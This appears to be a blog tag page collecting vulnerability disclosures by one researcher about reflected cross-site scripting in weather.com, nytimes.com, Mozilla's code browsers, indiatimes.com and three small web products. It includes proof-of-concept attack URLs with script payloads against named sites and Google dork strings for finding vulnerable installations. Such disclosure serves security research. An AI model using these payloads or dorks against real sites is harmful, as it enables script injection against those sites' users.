標籤 XSS 下的所有文章

The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks

 
 

GTY_email_hacker_dm_130718_16x9_608

 

The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks

 

 

Domain Description:
http://www.weather.com/

 

“The Weather Channel is an American basic cable and satellite television channel which broadcasts weather forecasts and weather-related news and analyses, along with documentaries and entertainment programming related to weather. Launched on May 2, 1982, the channel broadcasts weather forecasts and weather-related news and analysis, along with documentaries and entertainment programming related to weather."

 

“As of February 2015, The Weather Channel was received by approximately 97.3 million American households that subscribe to a pay television service (83.6% of U.S. households with at least one television set), which gave it the highest national distribution of any U.S. cable channel. However, it was subsequently dropped by Verizon FiOS (losing its approximately 5.5 millions subscribers), giving the title of most distributed network to HLN. Actual viewership of the channel averaged 210,000 during 2013 and has been declining for several years. Content from The Weather Channel is available for purchase from the NBCUniversal Archives." (Wikipedia)

 

 

 

 

Vulnerability description:


The Weather Channel has a cyber security problem. Hacker can exploit it by XSS bugs.

 

Almost all links under the domain weather.com are vulnerable to XSS attacks. Attackers just need to add script at the end of The Weather Channel’s URLs. Then the scripts will be executed.

 

10 thousands of Links were tested based a self-written tool. During the tests, 76.3% of links belong to weather.com were vulnerable to XSS attacks.

 

The reason of this vulnerability is that Weather Channel uses URLs to construct its HTML tags without filtering malicious script codes.

 

The vulnerability can be attacked without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.

 

 

 

 

weather_1_xss

 
 

weather_2_xx

 

 

POC Codes, e.g.

http://www.weather.com/slideshows/main/“–/>"><img src=x onerror=prompt(‘justqdjing’)>

http://www.weather.com/home-garden/home/white-house-lawns-20140316%22–/“–/>"><img src=x onerror=prompt(‘justqdjing’)>t%28%27justqdjing%27%29%3E

http://www.weather.com/news/main/“><img src=x onerror=prompt(‘justqdjing’)>

 

 

The Weather Channel has patched this Vulnerability in late November, 2014 (last Week). “The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers’ right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the fllowing web securities have been published here, Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. This bug was published at The Full Disclosure in November, 2014.

 

 

 

Discovered by:
Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)

 

 

 

 

More Details:
http://seclists.org/fulldisclosure/2014/Nov/89
http://lists.openwall.net/full-disclosure/2014/11/27/3
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253
https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1
http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-flaw
http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-exploit
http://diebiyi.com/articles/security/the-weather-channel-bug
http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8
https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-flaw
http://tetraph.blog.163.com/blog/static/234603051201411475314523/
http://tetraph.blogspot.com/2014/12/the-weather-channel-xss.html
http://ithut.tumblr.com/post/121916595448/weather-channel-xss
https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-bug
http://computerobsess.blogspot.com/2014/12/the-weather-channel-xss.html
http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-bug

 

 

 

廣告

The New York Times Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)

 
 

binary_data_illustratio_450

 

Domain:
http://www.nytimes.com/

 

“The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper’s print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as “The Gray Lady", The New York Times is long regarded within the industry as a national “newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper’s publisher and the company’s chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper’s motto, “All the News That’s Fit to Print", appears in the upper left-hand corner of the front page." (Wikipedia)

 

 

 

(1) Vulnerability Description:

The New York Times has a computer cyber security problem. Hacker can exploit its users by XSS bugs.

 

The code program flaw occurs at New York Times’s URLs. Nytimes (short for New York Times) uses part of the URLs to construct its pages. However, it seems that Nytimes does not filter the content used for the construction at all before 2013.

 

Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All pages of articles). In fact, all article pages that contain “PRINT” button, “SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.

 

Nytimes changed this mechanism since 2013. It decodes the URLs sent to its server. This makes the mechanism much safer now.

 

However, all URLs before 2013 are still using the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter URLs before is cost. It costs too much (money & human capital) to change the database of all posted articles before.

 

 

nytimes_2010_xss

 

nytimes_2011_xss

 

 

 

 

Living POCs Codes:

http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//’ “><img src=x onerror=prompt(/justqdjing/)>?pagewanted=all&_r=0

http://www.nytimes.com/2010/12/07/opinion/07brooks.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2009/08/06/technology/06stats.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2008/07/09/dining/091crex.html//’ “><img src=x onerror=prompt(/justqdjing/)>

http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//’ “><img src=x onerror=prompt(/justqdjing/)>

 

 

 

(2) Vulnerability Analysis:
Take the following link as an example,
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“><vulnerabletoattack

 

It can see that for the page reflected, it contains the following codes. All of them are vulnerable.

 

<li class=”print”>

<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=print”>Print</testtesttest?pagewanted=print”></a>

</li>

 

<li class=”singlePage”>

<a href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?pagewanted=all”></a>

</li>

 

<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>2</testtesttest?pagewanted=2″></a>

</li>

 

<li> <a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=3″>3</testtesttest?pagewanted=3″></a>

</li>

 

<a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”><vulnerabletoattack?pagewanted=2″>Next Page »</testtesttest?pagewanted=2″></a>

 

 

 

 

(3) What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

 

“Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)

 

The vulnerability can be attacked without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.

 

 

 

Discover and Reporter:
Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)

 

 

 

 

More Details:
http://lists.openwall.net/full-disclosure/2014/10/16/2
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102
http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss
http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss
https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1
http://webtech.lofter.com/post/1cd3e0d3_6f57c56
http://tetraph.blog.163.com/blog/static/2346030512014101270479/
https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss
http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles
http://securityrelated.blogspot.com/2014/10/new-york-times-design.html
https://mathfas.wordpress.com/2014/11/01/new-york-times-xss
http://computerobsess.blogspot.com/2014/10/new-york-times-design.html
http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss
http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss

 

 

 

Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)

6864_cTAUHWda_o-600x401

 

 

Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)

 

Websites information:
“lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest." (from Mozilla)

“Mozilla is a free-software community which produces the Firefox web browser. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. In addition to the Firefox browser, Mozilla also produces Thunderbird, Firefox Mobile, the Firefox OS mobile operating system, the bug tracking system Bugzilla and a number of other projects." (Wikipedia)

 

 

 

(1) Vulnerability description:
Mozilla website has a computer cyber security problem. Hacker can attack it by XSS bugs. Here is the description of XSS: “Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)

 

 

All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source

This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla’s users.

Since there are large number of pages under them. Meanwhile, the contents of the two domains vary. This makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla’s variety class of users.

 

 

mozilla_lxr_2_xss

 
 

mozilla_mxr_1_xss

 

 

 

POC Codes:

http://lxr.mozilla.org/mozilla-central/source/<body onload=prompt(“justqdjing")>

http://mxr.mozilla.org/mozilla-central/source/<body onload=prompt(“justqdjing")>

http://mxr.mozilla.org/mozilla-central/source/webapprt/<body onload=prompt(“justqdjing")>

 

(2) Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest&gt;

In the page reflected, it contains the following codes.

<a href="/mozilla-central/source/chrome/%253Cattacktest%253E">

<attacktest></attacktest>

</a>

If insert “<body onload=prompt(“justqdjing")>" into the URL, the code can be executed.

The vulnerability can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

 

 

(3) Vulnerability Disclosure:
The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.

 


Discovered and Reported by:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tetraph.com/wangjing/

 

 

More Details:
http://lists.openwall.net/full-disclosure/2014/10/20/8
http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure
http://seclists.org/fulldisclosure/2014/Oct/92
http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss
http://whitehatview.tumblr.com/post/101466861221/mozilla-mozilla
http://tetraph.blog.163.com/blog/static/2346030512014101115642885/
http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html
https://tetraph.wordpress.com/2014/11/26/mozilla-two-sub-domains-xss
http://tetraph.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html
http://itsecurity.lofter.com/post/1cfbf9e7_54fc68f
http://whitehatview.tumblr.com/post/103540568486/two-of-mozillas-cross
http://diebiyi.com/articles/security/xss-vulnerability/mozilla-xss
http://www.inzeed.com/kaleidoscope/xss-vulnerability/mozilla-xss
https://mathfas.wordpress.com/2014/11/01/mozilla-xss
http://www.tetraph.com/blog/xss-vulnerability/mozilla-xss
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121

All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks

 
 
Secure website



(1) Domain Description:
http://www.indiatimes.com

“The Times of India (TOI) is an Indian English-language daily newspaper. It is the third-largest newspaper in India by circulation and largest selling English-language daily in the world according to Audit Bureau of Circulations (India). According to the Indian Readership Survey (IRS) 2012, the Times of India is the most widely read English newspaper in India with a readership of 7.643 million. This ranks the Times of India as the top English daily in India by readership. It is owned and published by Bennett, Coleman & Co. Ltd. which is owned by the Sahu Jain family. In the Brand Trust Report 2012, Times of India was ranked 88th among India’s most trusted brands and subsequently, according to the Brand Trust Report 2013, Times of India was ranked 100th among India’s most trusted brands. In 2014 however, Times of India was ranked 174th among India’s most trusted brands according to the Brand Trust Report 2014, a study conducted by Trust Research Advisory." (en.Wikipedia.org)

 

 

 

(2) Vulnerability description:

The web application indiatimes.com online website has a security problem. Hacker can exploit it by XSS bugs.

 

The code flaw occurs at Indiatimes’s URL links. Indiatimes only filter part of the filenames in its website. All URLs under Indiatimes’s “photogallery" and “top-llists" topics are affected.

Indiatimes uses part of the links under “photogallery" and “top-llists" topics to construct its website content without any checking of those links at all. This mistake is very popular in nowaday websites. Developer is not security expert.

The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (12.04) and Microsoft IE (9.0.15) in Windows 7.

 

 

indiatimes_xss_2

 

indiatimes_xss1

 

 

POC Codes:

http://www.indiatimes.com/photogallery/“>homeqingdao<img src=x onerror=prompt(‘justqdjing’)>

http://www.indiatimes.com/top-lists/“>singaporemanagementuniversity<img src=x onerror=prompt(‘justqdjing’)>

http://www.indiatimes.com/photogallery/lifestyle/“>astar<img src=x onerror=prompt(‘justqdjing’)>

http://www.indiatimes.com/top-lists/technology/“>nationaluniversityofsingapore<img src=x onerror=prompt(‘justqdjing’)>

 

 

 

 

What is XSS?

“Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." (OWASP)

 

 

 

(3) Vulnerability Disclosure:

The vulnerabilities were reported to Indiatimes in early September, 2014. However they are still unpatched.

Discovered and Reported by:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tetraph.com/wangjing/

 

 

 

 

Related Articles:
http://seclists.org/fulldisclosure/2014/Nov/91
http://lists.openwall.net/full-disclosure/2014/11/27/6
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256
https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1
http://tetraph.blog.163.com/blog/static/234603051201501352218524/
https://cxsecurity.com/issue/WLB-2014120004
https://mathfas.wordpress.com/2014/12/04/all-links-in-two-topics-of-indiatimes
http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes
http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics
http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9
http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html
https://vulnerabilitypost.wordpress.com/2014/12/04/indiatimes-xss
http://whitehatview.tumblr.com/post/104310651681/times-of-india-website
http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-xss

CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities

cit_e_net
 

CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities

Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities

Product: Cit-e-Access

Vendor: Cit-e-Net

Vulnerable Versions: Version 6

Tested Version: Version 6

Advisory Publication: February 12, 2015

Latest Update: June 01, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-8753

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

CVSS Version 2 Metrics:

Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism

Access Complexity: Medium

Authentication: Not required to exploit

Impact Type: Allows unauthorized modification

Discover and Author: Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)

 

 

Instruction Details:

(1) Vendor & Product Description:




Vendor:

Cit-e-Net

 

 

Product & Version:

Cit-e-Access

Version 6

 

 

Vendor URL & Download:

Cit-e-Net can be downloaded from here,

 

 

Product Introduction:

“We are a premier provider of Internet-based solutions encompassing web site development and modular interactive e-government applications which bring local government, residents and community businesses together.

Cit-e-Net provides a suite of on-line interactive services to counties, municipalities, and other government agencies, that they in turn can offer to their constituents. The municipal government achieves a greater degree of efficiency and timeliness in conducting the daily operations of government, while residents receive improved and easier access to city hall through the on-line access to government services.


Our web-based applications can help your municipality to acheive its e-government goals. Type & click website content-management empowers the municipality to manage the website quickly and easily. Web page styles & formats are customizable by the municipality, and because the foundation is a database application, user security can be set for individual personnel and module applications. Our application modules can either be integrated into your existing municipal web site or implemented as a complete web site solution. It’s your choice! Please contact us at info@cit-e.net to view a demonstration of our municipal web site solution if you are an elected official or member of municipal management and your municipality is looking for a cost efficient method for enhancing & improving municipal services.


Interactive Applications

Online Service Requests

Online Tax Payments by ACH electronic-check or credit card.

Online Utility Payments by ACH electronic-check or credit card.

Online General-Payments by ACH electronic-check or credit card.

Submit Volunteer Resume’s Online for the municipality to match your skills with available openings."

 

 

 

(2) Vulnerability Details:

Cit-e-Access web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server.

Several similar products 0Day vulnerabilities have been found by some other bug hunter researchers before. Cit-i-Access has patched some of them. Open Sourced Vulnerability Database (OSVDB) is an independent and open-sourced database. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories, solutions details related to important vulnerabilities.

 

 

(2.1) The first programming code flaw occurs at “/eventscalendar/index.cfm?" page with “&DID" parameter in HTTP GET.

(2.2) The second programming code flaw occurs at “/search/index.cfm?" page with “&keyword" parameter in HTTP POST.

(2.3) The third programming code flaw occurs at “/news/index.cfm" page with “&jump2″ “&DID" parameter in HTTP GET.

(2.4) The fourth programming code flaw occurs at “eventscalendar?" page with “&TPID" parameter in HTTP GET.

(2.5) The fifth programming code flaw occurs at “/meetings/index.cfm?" page with “&DID" parameter in HTTP GET.

 

 

 

 

(3) Solutions:

Leave message to vendor. No response.
http://www.cit-e.net/contact.cfm

 

 

 

 

 

References:
http://seclists.org/fulldisclosure/2015/Feb/48
http://lists.openwall.net/full-disclosure/2015/02/13/2
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html
https://computerpitch.wordpress.com/2015/06/07/cve-2014-8753/
http://webtechhut.blogspot.com/2015/06/cve-2014-8753.html
https://www.facebook.com/websecuritiesnews/posts/804176613035844
https://twitter.com/tetraphibious/status/607381197077946368
http://biboying.lofter.com/post/1cc9f4f5_7356826
http://shellmantis.tumblr.com/post/120903342496/securitypost-cve-2014-8753
http://itprompt.blogspot.com/2015/06/cve-2014-8753.html
http://whitehatpost.blog.163.com/blog/static/24223205420155710559404/
https://plus.google.com/u/0/113115469311022848114/posts/FomMK9BGGx2
https://www.facebook.com/pcwebsecurities/posts/702290949916825
http://securitypost.tumblr.com/post/120903225352/cve-2014-8753-cit-e-net
http://webtech.lofter.com/post/1cd3e0d3_7355910
http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/
http://diebiyi.com/articles/security/cve-2014-8753/

 

 

 

Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

gconts_xss1

 

Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

 

Exploit Title: Gcon Tech Solutions v1.0 content.php? &id Parameter XSS Security Vulnerabilities

Product: Gcon Tech Solutions

Vendor: Gcon Tech Solutions

Vulnerable Versions: v1.0

Tested Version: v1.0

Advisory Publication: May 23, 2015

Latest Update: May 23, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Writer and Reporter: Wang Jing [School of Physical and Mathematical Sciences, Nanyang Technological University (NTU), Singapore] (@justqdjing)

 

 

 

 

Recommendation Details:

 

(1) Vendor & Product Description:

Vendor:

Gcon Tech Solutions

 

Product & Vulnerable Versions:

Gcon Tech Solutions

v1.0

 

Vendor URL & Download:

Gcon Tech Solutions can be obtained from here,

http://www.gconts.com/Development.htm

 

Google Dork:

“Developed and maintained by Gcon Tech Solutions"

 

Product Introduction Overview:

“Over the years we have developed business domain knowledge various business areas. We provide Development Services either on time and material or turn-key fixed prices basis, depending on the nature of the project. Application Development Services offered by Gcon Tech Solutions help streamline business processes, systems and information. Gcon Tech Solutions has a well-defined and mature application development process, which comprises the complete System Development Life Cycle (SDLC) from defining the technology strategy formulation to deploying, production operations and support. We fulfill our client’s requirement firstly from our existing database of highly skilled professionals or by recruiting the finest candidates locally. We analyze your business requirements and taking into account any constraints and preferred development tools, prepare a fixed price quote. This offers our customers a guaranteed price who have a single point contact for easy administration. We adopt Rapid Application Development technique where possible for a speedy delivery of the Solutions. Salient Features of Gcon Tech Solutions Application Development Services: (a) Flexible and Customizable. (b) Industry driven best practices. (c) Knowledgebase and reusable components repository. (d) Ensure process integration with customers at project initiation"

 

 

 

(2) Vulnerability Details:

Gcon Tech Solutions web application has a computer cyber security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server.

Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. Gcon Tech Solutions has patched some of them. The Mail Archive automatically detects when it receives mail from a new list. Thus, you are encouraged, although certainly not required, to send a test message to the newly archived list. If you are adding several lists to the archive, send a separate and distinct test message to each one. It also publishes suggestions, advisories, solutions details related to XSS vulnerabilities and cyber intelligence recommendations.

 

(2.1) The first programming code flaw occurs at “&id" parameter in “content.php?" page.

 

 

 

 

 

References:

http://www.tetraph.com/security/xss-vulnerability/gcon-tech-solutions-v1-0-xss/

http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-xss-cross-site.html

http://www.inzeed.com/kaleidoscope/computer-web-security/gcon-tech-solutions-v1-0-xss/

http://diebiyi.com/articles/security/gcon-tech-solutions-v1-0-xss/

https://webtechwire.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-xss/

http://computerobsess.blogspot.com/2015/05/gcon-tech-solutions-v10-xss.html

http://whitehatpost.blog.163.com/blog/static/24223205420154245138791/

https://itswift.wordpress.com/2015/05/24/gcon-tech-solutions-v1-0-xss/

https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02028.html

http://cxsecurity.com/issue/WLB-2015050068

http://seclists.org/fulldisclosure/2015/May/34

https://www.bugscan.net/#!/x/21839

http://www.openwall.com/lists/oss-security/2015/05/22/6

http://lists.openwall.net/full-disclosure/2015/04/05/8

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1957

Web Technology Wire

gconts_xss1

Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

Exploit Title: Gcon Tech Solutions v1.0 content.php? &id Parameter XSS Security Vulnerabilities

Product: Gcon Tech Solutions

Vendor: Gcon Tech Solutions

Vulnerable Versions: v1.0

Tested Version: v1.0

Advisory Publication: May 23, 2015

Latest Update: May 23, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Writer and Reporter: Wang Jing [School of Physical and Mathematical Sciences, Nanyang Technological University (NTU), Singapore] (@justqdjing)

Recommendation Details:

(1) Vendor & Product Description:

Vendor:

Gcon Tech Solutions

Product & Vulnerable Versions:

Gcon Tech Solutions

v1.0

Vendor URL & Download:

Gcon Tech Solutions can be obtained from here,

http://www.gconts.com/Development.htm

Google Dork:

“Developed and maintained by Gcon Tech Solutions"

Product Introduction Overview:

“Over the years we have developed business domain knowledge various business areas. We provide…

View original post 詳見內文:約344字

SITEFACT CMS XSS (Cross-site Scripting) Web Security Vulnerabilities

sitefact_xss2

 

SITEFACT CMS XSS (Cross-site Scripting) Web Security Vulnerabilities

 

Exploit Title: SITEFACT CMS content.php? &id Parameter XSS Security Vulnerabilities

Product: SITEFACT CMS (Content Management System)

Vendor: SITEFACT

Vulnerable Versions: version 2.01

Tested Version: version 2.01

Advisory Publication: May 24, 2015

Latest Update: May 24, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

CVSS Version 2 Metrics:

Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism

Access Complexity: Medium

Authentication: Not required to exploit

Impact Type: Allows unauthorized modification

Writer and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)

 

 

 

Recommendation Details:

 

(1) Vendor & Product Description:

Vendor:

SITEFACT

 

Product & Vulnerable Versions:

SITEFACT

version 2.01

 

Vendor URL & Download:

Product can be obtained from here,

http://www.sitefact.de/index.cfm?resid=1&res=1024&sid=2&skt=2279

 

Google Dork:

“Powered by SITEFACT"

 

Product Introduction Overview:

“Publish . Your content without any prior knowledge on the Internet Numerous integrated tools are available . Images, documents and movies can be provided with a click. We present yourself individually and professionally to your CI and your wishes . About a layout interface design can change at any time , or of course your own layout to be integrated. Our content management system is designed for search engine indexing . You can easily book your website for search engines like Google , Bing , Yahoo , … optimize .."

“By running his own web server , you do not need a provider and need to install anything . Updates are performed automatically and for free . All you need is a PC with Internet access. SITE FACT is a proprietary development of Arvenia GmbH . Therefore, we can always realize your individual wishes and integrate them into SITE FACT. If you need our assistance , please contact our free support. With personal contact and landline number during the entire runtime."

 

 

 

(2) Vulnerability Details:

SITEFACT web application has a computer cyber security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server.

Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. SITEFACT has patched some of them. The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers’ right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here! It also publishes suggestions, advisories, solutions details related to XSS vulnerabilities and cyber intelligence recommendations.

 

(2.1) The first programming flaw occurs at “/index.cfm?" page with “&res" “&skt" “&pid" parameters.

 

(2.2) The second programming flaw occurs at login domain “/index.cfm?" page with “&sid" parameter.

 

 

 

 

 

References:

http://www.tetraph.com/security/xss-vulnerability/sitefact-cms-xss/

http://securityrelated.blogspot.com/2015/05/sitefact-cms-xss.html

http://www.inzeed.com/kaleidoscope/computer-security/sitefact-cms-xss/

http://www.diebiyi.com/articles/security/sitefact-cms-xss/

